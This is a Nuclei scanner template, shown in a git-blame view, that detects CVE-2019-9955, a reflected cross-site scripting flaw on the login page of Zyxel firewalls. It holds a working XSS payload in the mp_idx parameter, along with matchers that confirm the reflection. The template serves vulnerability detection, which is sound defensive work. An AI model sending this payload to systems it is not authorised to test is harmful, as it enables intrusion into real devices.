2021-01-09 14:45:11 +00:00
|
|
|
id: CVE-2019-9955
|
|
|
|
|
|
|
|
info:
|
2022-09-08 13:28:46 +00:00
|
|
|
name: Zyxel - Cross-Site Scripting
|
2021-04-06 06:46:11 +00:00
|
|
|
author: pdteam
|
2021-09-10 11:26:40 +00:00
|
|
|
severity: medium
|
2022-09-08 13:28:46 +00:00
|
|
|
description: Zyxel ATP200, ATP500, ATP800, USG20-VPN, USG20W-VPN, USG40, USG40W, USG60, USG60W, USG110, USG210, USG310, USG1100, USG1900, USG2200-VPN, ZyWALL 110, ZyWALL 310, and ZyWALL 1100 devices contain a reflected cross-site scripting vulnerability on the security firewall login page via the mp_idx parameter.
|
2021-08-18 11:37:49 +00:00
|
|
|
reference:
|
2022-04-22 10:38:41 +00:00
|
|
|
- http://packetstormsecurity.com/files/152525/Zyxel-ZyWall-Cross-Site-Scripting.html
|
|
|
|
- https://www.exploit-db.com/exploits/46706/
|
|
|
|
- https://www.securitymetrics.com/blog/Zyxel-Devices-Vulnerable-Cross-Site-Scripting-Login-page
|
|
|
|
- https://www.zyxel.com/support/reflected-cross-site-scripting-vulnerability-of-firewalls.shtml
|
2022-09-08 13:28:46 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-9955
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 6.1
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2019-9955
|
|
|
|
cwe-id: CWE-79
|
2022-08-27 04:41:18 +00:00
|
|
|
tags: zyxel,packetstorm,seclists,edb,cve,cve2019,xss
|
2021-01-09 14:45:11 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
2022-02-24 22:17:07 +00:00
|
|
|
- "{{BaseURL}}/?mp_idx=%22;alert(%271%27);//"
|
|
|
|
|
2021-01-09 14:45:11 +00:00
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- "\";alert('1');//"
|
|
|
|
- "<title>Welcome</title>"
|
|
|
|
condition: and
|
2022-09-08 13:28:46 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/08/31
|